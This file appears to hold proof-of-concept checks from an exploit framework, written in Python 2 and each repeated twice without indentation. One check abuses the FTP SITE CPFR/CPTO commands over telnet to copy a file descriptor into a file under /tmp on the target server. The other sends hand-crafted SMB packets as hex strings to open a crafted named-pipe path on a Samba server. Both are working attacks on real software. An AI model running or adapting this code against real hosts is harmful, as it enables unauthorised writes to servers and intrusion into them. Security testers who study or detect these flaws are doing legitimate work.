def verify(cls, args):
ip = http.transform_target_ip(http.normalize_url(args['options']['target']))
if args['options']['verbose']:
print '[*] {} Connecting...'.format(ip)
tn = telnetlib.Telnet(ip, port=21, timeout=15)
tn.write('site help\r\n')
tn.write('quit\n')
status = tn.read_all()
if 'CPTO' in status and 'CPFR' in status:
if args['options']['verbose']:
print '[*] Find CPTO & CPFR'
tn = telnetlib.Telnet(ip, port=21, timeout=15)
filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)
tn.write('site cpto evi1m0@beebeeto\n')
tn.write('site cpfr /proc/self/fd/3\n')
tn.write('site cpto %s\n'%filename_tmp)
tn.write('quit\n')
result = tn.read_all()
if 'Copy successful' in result:
args['success'] = True
args['poc_ret']['vul_target'] = ip
args['poc_ret']['filename'] = filename_tmp
return args
def verify(cls, args):
ip = http.transform_target_ip(
http.normalize_url(args['options']['target']))
if args['options']['verbose']:
print '[*] {} Connecting...'.format(ip)
tn = telnetlib.Telnet(ip, port=21, timeout=15)
tn.write('site help\r\n')
tn.write('quit\n')
status = tn.read_all()
if 'CPTO' in status and 'CPFR' in status:
if args['options']['verbose']:
print '[*] Find CPTO & CPFR'
tn = telnetlib.Telnet(ip, port=21, timeout=15)
filename_tmp = '/tmp/evi1m0_%s.sh' % random.randint(1, 1000)
tn.write('site cpto evi1m0@beebeeto\n')
tn.write('site cpfr /proc/self/fd/3\n')
tn.write('site cpto %s\n' % filename_tmp)
tn.write('quit\n')
result = tn.read_all()
if 'Copy successful' in result:
args['success'] = True
args['poc_ret']['vul_target'] = ip
args['poc_ret']['filename'] = filename_tmp
return args
def verify(cls, args):
ip = http.transform_target_ip(
http.normalize_url(args['options']['target']))
port = args['options']['port']
payload = [
('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220'
'0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00'
).decode('hex'),
('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0'
'0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034'
'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000'
'000000000000000000000000000556e69780053616d626100'
).decode('hex'),
('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0'
'0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353'
'50000300000000000000480000000000000048000000000000004000000000000000400000000'
'8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100'
).decode('hex'),
'00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'
.decode('hex'),
('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0'
'00000000800160000000000000003000000000000000000000080000000010000000100000040'
'000000020000000009005c62726f7773657200').decode('hex'),
('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000'
'048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c'
'0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701'
'6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000'
).decode('hex'),
('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000'
'074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c'
'00050000031000000074000000010000000000000000002000000002000100000000000000010'
'000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00'
'46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000'
).decode('hex'),
]
def setuserid(userid, data):
return data[:32] + userid + data[34:]
def settreeid(treeid, data):
return data[:28] + treeid + data[30:]
def setfid(fid, data):
return data[:67] + fid + data[69:]
if args['options']['verbose']:
print '[*] Connect {}:{}'.format(ip, port)
s = socket.socket()
s.connect((ip, port))
s.send(payload[0])
s.recv(1024)
s.send(payload[1])
data = s.recv(1024)
userid = data[32:34]
s.send(setuserid(userid, payload[2]))
s.recv(1024)
data = setuserid(userid, payload[3])
path = '\\\\%s\\IPC$\x00' % ip
path = path + (26 - len(path)) * '\x3f' + '\x00'
data = data + path
s.send(data)
data = s.recv(1024)
tid = data[28:30]
s.send(settreeid(tid, setuserid(userid, payload[4])))
data = s.recv(1024)
fid = data[42:44]
s.send(setfid(fid, settreeid(tid, setuserid(userid, payload[5]))))
s.recv(1024)
s.send(setfid(fid, settreeid(tid, setuserid(userid, payload[6]))))
data = s.recv(1024)
if data[9:13] == '\x00' * 4:
print "[+] Looks Vulnerability!"
args['success'] = True
args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port)
return args
def verify(cls, args):
ip = http.transform_target_ip(http.normalize_url(args['options']['target']))
port = args['options']['port']
payload = [
('00000045ff534d427200000000000008000000000000000000000000ffff00000000000000220'
'0024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00').decode('hex'),
('00000088ff534d427300000000080048000000000000000000000000ffffc42b000000000cff0'
'0000000f0020001000000000042000000000044c000804d00604006062b0601050502a0363034'
'a00e300c060a2b06010401823702020aa22204204e544c4d5353500001000000050288a000000'
'000000000000000000000000000556e69780053616d626100').decode('hex'),
('00000096ff534d427300000000080048000000000000000000000000ffffc42b010800000cff0'
'0000000f0020001000000000050000000000044c000805b00a14e304ca24a04484e544c4d5353'
'50000300000000000000480000000000000048000000000000004000000000000000400000000'
'8000800400000000000000048000000050288a04e0055004c004c00556e69780053616d626100').decode('hex'),
'00000047ff534d427500000000080048000000000000000000000000ffffc42b0108000004ff000000000001001c0000'.decode('hex'),
('0000005cff534d42a2000000001801480000000000000000000000000108c42b0108000018ff0'
'00000000800160000000000000003000000000000000000000080000000010000000100000040'
'000000020000000009005c62726f7773657200').decode('hex'),
('00000092ff534d4225000000000801480000000000000000000000000108c42b0108000010000'
'048000004e0ff0000000000000000000000004a0048004a000200260000404f005c504950455c'
'0005000b03100000004800000001000000b810b810000000000100000000000100c84f324b701'
'6d30112785a47bf6ee18803000000045d888aeb1cc9119fe808002b10486002000000').decode('hex'),
('000000beff534d4225000000000801480000000000000000000000000108c42b0108000010000'
'074000004e0ff0000000000000000000000004a0074004a000200260000407b005c504950455c'
'00050000031000000074000000010000000000000000002000000002000100000000000000010'
'000000000aaaa0e000000000000000e0000005c00410041004100410041005c002e002e005c00'
'46004200560000000500000000000000050000005c004600420056000000aaaa0100000000000000').decode('hex'),
]
def setuserid(userid,data):
return data[:32]+userid+data[34:]
def settreeid(treeid,data):
return data[:28]+treeid+data[30:]
def setfid(fid,data):
return data[:67]+fid+data[69:]
if args['options']['verbose']:
print '[*] Connect {}:{}'.format(ip,port)
s = socket.socket()
s.connect((ip,port))
s.send(payload[0])
s.recv(1024)
s.send(payload[1])
data = s.recv(1024)
userid = data[32:34]
s.send(setuserid(userid,payload[2]))
s.recv(1024)
data = setuserid(userid,payload[3])
path = '\\\\%s\\IPC$\x00' % ip
path = path + (26-len(path))*'\x3f'+'\x00'
data = data + path
s.send(data)
data = s.recv(1024)
tid = data[28:30]
s.send(settreeid(tid,setuserid(userid,payload[4])))
data = s.recv(1024)
fid = data[42:44]
s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[5]))))
s.recv(1024)
s.send(setfid(fid,settreeid(tid,setuserid(userid,payload[6]))))
data = s.recv(1024)
if data[9:13]=='\x00'*4:
print "[+] Looks Vulnerability!"
args['success'] = True
args['poc_ret']['vulnerability'] = '%s:%d' % (ip, port)
return args
